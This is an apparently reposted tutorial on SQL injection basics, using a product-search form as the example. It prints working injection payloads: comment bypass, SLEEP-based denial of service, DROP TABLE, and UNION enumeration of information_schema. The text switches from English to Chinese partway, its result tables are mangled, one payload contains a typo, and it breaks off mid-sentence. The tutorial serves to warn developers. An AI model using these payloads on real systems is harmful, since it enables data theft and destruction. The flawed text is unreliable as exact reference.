Home > Database > SQL > Quickly understand the basic principles of sql injection

Quickly understand the basic principles of sql injection

angryTom
Release: 2019-11-29 14:42:13
forward
3382 people have browsed it

Quickly understand the basic principles of sql injection

##Basic Principles of SQL Injection

WEB technology is developing rapidly, but the traditional craft of spelling SQL with bare hands is still favored by quite a few developers. After all, compared to learning a complex set of ORM rules, doing it by hand is more convenient and intuitive. Usually people who write SQL by themselves should have heard that

SQL injection is dangerous, but they always think to themselves: My SQL statement is so simple that it cannot be injected.

Take 5 minutes to read this complete example. From now on, you should never dare to take any chances.

Simple scenario

There is a WEB interface that provides input of product names and displays corresponding price, production date and production location information. For example, enter Hammer display:

ProductPricePlace of productionDate of productionClaw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11##We skipped the process of building a web search interface, Focus directly on the key parts:
SQL injection

. If we want to realize the above function, then we can roughly guess that the SQL statement used by the server is as follows:

SELECT ? FROM ? WHERE ? LIKE '%Hammer%';
Copy after login

where? means that we currently do not know the specific table name and field name, and this SQL is unique What can be manipulated is the input content inside single quotes '%Hammer%'. If we directly enter a single quote in the search box. That is, it becomes

select ? from ? where ? Like '%'%';
Copy after login

. After splicing like this, it will cause a SQL syntax error and no results will be obtained. We need to use

--

to comment out the last single quote. <div class="code" style="position:relative; padding:0px; margin:0px;"><pre class="brush:sql;toolbar:false;">select ? from ? where ? Like &amp;#39;%&amp;#39;; -- %&amp;#39;;</pre><div class="contentsignin">Copy after login</div></div>

--

is followed by the comment content (you can also use #), so that you can get all the product information. So far, I still haven’t smelled it. Danger signal.

##ProductPricePlace of productionDate of productionClaw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11Paring Knife10.98China2019.11.11Boning Knife19.98China2019.01.01Try it off and

Hold on to the expandable single quote part in the previous step. Let’s try a simple delay statement:

select ? from ? where ? Like &#39;%Hammer%&#39; and 1 = SLEEP(2); -- %&#39;;
Copy after login

At this time, the query will take 2 seconds to return the result. If the time is extended, use the script to query several times, and the database connection pool can be restored in one go. run out.

Of course, there are even more destructive ones!

select ? from ? where ? Like &#39;%Hammer%&#39;; drop table xxxx; -- %&#39;;
Copy after login

You can directly delete the table/database. As for how to know which tables are in the database (that is, how to determine xxxx in the previous SQL sentence)?

Do whatever you want union

We need to know what tables this database has! Only in this way can you get useful information.

You can use union to put the contents of different tables together. Give it a try:

select ?,?,?,? from ? where ? Like &#39;%Hammer%&#39; UNION (select 1,2,3,4 from dual); -- %&#39;;
Copy after login

##ProductPriceClaw Hammer12.9829.982
Place of productionDate of production
American2019.11.07Club Hammer
Canada2019.11.111
34

可以看到我们把假数据1,2,3,4成功地拼接到搜索结果中。

Mysql系统自带的信息都存在information_schema数据库中。我们试着在里面找找有用的信息。

select ? from ? where ? Like &#39;%Hammer%&#39; UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); -- %&#39;;
Copy after login
产品价格生产地生产日期
Claw Hammer12.98American2019.11.07
Club Hammer29.98Canada2019.11.11
authorshawkeye34
productshawkeye34
userhawkeye34
........34

现在知道了这些数据库名和表名,所有人都对它为所欲为了!(包括上面执行的DROP)。

看着列表一猜就能知道我们目前查的是products表,接下来我们再把products具体的字段也挖出来。

select ? from ? where ? Like &#39;%Hammer%&#39; UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name = &#39;products&#39;); -- %&#39;;
Copy after login
产品价格生产地生产日期
Claw Hammer12.98American2019.11.07
Club Hammer29.98Canada2019.11.11
idhawkeye34
namehawkeye34
pricehawkeye34
addresshawkeye34
updated_athawkeye34

所以,通过上面2步,我们知道了表名和字段名,那么查询API的完整SQL应该是(把上面的?都补全啦):

select name,price,address,updated_at from products where name like &#39;%Hammer%&#39;;
Copy after login

通过不断重复以上几个步骤,你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的user表

The above is the detailed content of Quickly understand the basic principles of sql injection. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:cnblogs.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template